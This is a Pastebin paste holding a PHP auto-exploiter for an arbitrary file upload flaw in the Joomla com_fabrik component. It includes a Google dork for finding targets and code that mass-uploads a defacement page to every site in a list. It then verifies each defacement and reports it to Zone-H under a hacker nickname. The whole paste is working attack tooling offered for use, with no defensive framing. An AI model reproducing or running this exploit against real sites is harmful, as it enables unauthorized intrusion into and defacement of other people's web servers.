RokiAdhytama

Com_Fabrik Abritary File Upload From ACX

May 8th, 2019
69
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.73 KB | None | 0 0
  1. <?php
  2.  
  3. /**
  4.  
  5. Joomla Component com_fabrik Arbitrary File Upload
  6. Author: Et04 & bL@cKID
  7.  
  8. Google Dork
  9. inurl:/index.php?option=com_fabrik
  10.  
  11. Auto Exploiter (Auto Upload & Auto Submit Zone-H)
  12. Coded: VanGans
  13. */
  14.  
  15. Class ACX_Fabrik {
  16. public $url;
  17.  
  18. /* File deface anda dalam folder yang sama dengan tools ini */
  19. private $file = "index.htm";
  20.  
  21. /* Nick Hacker Kalian / Nick Zone -H Kalian */
  22. /* Pastikan dalam script deface kalian terdapat kata HACKED */
  23. public $hacker = "XZ-Sec";
  24.  
  25. public function __construct() {
  26. if(!file_exists(getcwd()."/".$this->file)) die("!! File ".$this->file." tidak ditemukan !!");
  27. }
  28.  
  29. public function validUrl() {
  30. if(!preg_match("/^http:\/\//", $this->url) AND !preg_match("/^https:\/\//", $this->url)) {
  31. $url = "http://".$this->url;
  32. return $url;
  33. } else {
  34. return $this->url;
  35. }
  36. }
  37.  
  38. public function curl($url, $data = null, $headers = null, $cookie = true) {
  39. $ch = curl_init();
  40. curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
  41. curl_setopt($ch, CURLOPT_URL, $url);
  42. curl_setopt($ch, CURLOPT_USERAGENT, "LamerTools");
  43. //curl_setopt($ch, CURLOPT_VERBOSE, TRUE);
  44. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
  45. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
  46. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  47. curl_setopt($ch, CURLOPT_TIMEOUT, 5);
  48.  
  49. if($data !== null) {
  50. curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "POST");
  51. curl_setopt($ch, CURLOPT_POST, TRUE);
  52. curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
  53. }
  54.  
  55. if($headers !== null) {
  56. curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
  57. }
  58.  
  59. if($cookie === true) {
  60. curl_setopt($ch, CURLOPT_COOKIE, TRUE);
  61. curl_setopt($ch, CURLOPT_COOKIEFILE, "cookie.txt");
  62. curl_setopt($ch, CURLOPT_COOKIEJAR, "cookie.txt");
  63. }
  64.  
  65. $exec = curl_exec($ch);
  66. $info = curl_getinfo($ch);
  67.  
  68. curl_close($ch);
  69.  
  70. return (object) [
  71. "response" => $exec,
  72. "info" => $info
  73. ];
  74.  
  75. }
  76.  
  77. public function exploit() {
  78. $url = $this->url."/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload";
  79. //$post = $this->curl($url, ["file" => "@L0c.htm"], null, false);
  80. $post = @shell_exec("curl --silent --connect-timeout 5 -X POST -F \"file=@".$this->file."\" \"$url\"");
  81. $result = (object) json_decode($post, true);
  82.  
  83. if(isset($result->error)) {
  84. print "[-] ".parse_url($this->url, PHP_URL_HOST)." [FAILED]\n";
  85. } else {
  86. if(isset($result->uri)) {
  87. if(preg_match("/hacked/i", $this->curl($result->uri)->response)) {
  88. print "[+] ".$result->uri." [OK]\n";
  89. $this->zoneh($result->uri);
  90. $this->save($result->uri);
  91. }
  92. }
  93. }
  94. }
  95.  
  96. public function zoneh($url) {
  97. $post = $this->curl("http://www.zone-h.com/notify/single", "defacer=".$this->hacker."&domain1=$url&hackmode=1&reason=1&submit=Send",null,false);
  98. if(preg_match("/color=\"red\">(.*?)<\/font><\/li>/i", $post->response, $matches)) {
  99. if($matches[1] === "ERROR") {
  100. preg_match("/<font color=\"red\">ERROR:<br\/>(.*?)<br\/>/i", $post->response, $matches2);
  101. print "[-] Zone-H ($url) [ERROR: ".$matches2[1]."]\n\n";
  102. } else {
  103. print "[+] Zone-H ($url) [OK]\n\n";
  104. }
  105. }
  106. }
  107.  
  108. public function save($isi) {
  109. $handle = fopen("result_fabrik.txt", "a+");
  110. fwrite($handle, "$isi\n");
  111. fclose($handle);
  112. }
  113.  
  114. }
  115.  
  116. $fabrik = new ACX_Fabrik();
  117.  
  118. if(!isset($argv[1])) die("!! Usage: php ".$argv[0]." target.txt");
  119. if(!file_exists($argv[1])) die("!! File target ".$argv[1]." tidak di temukan!!");
  120. $open = explode("\n", file_get_contents($argv[1]));
  121.  
  122. foreach($open as $list) {
  123. $fabrik->url = trim($list);
  124. $fabrik->url = $fabrik->validUrl();
  125.  
  126. print "[*] Exploiting ".parse_url($fabrik->url, PHP_URL_HOST)."\n";
  127. $fabrik->exploit();
  128. }
Add Comment
Please, Sign In to add comment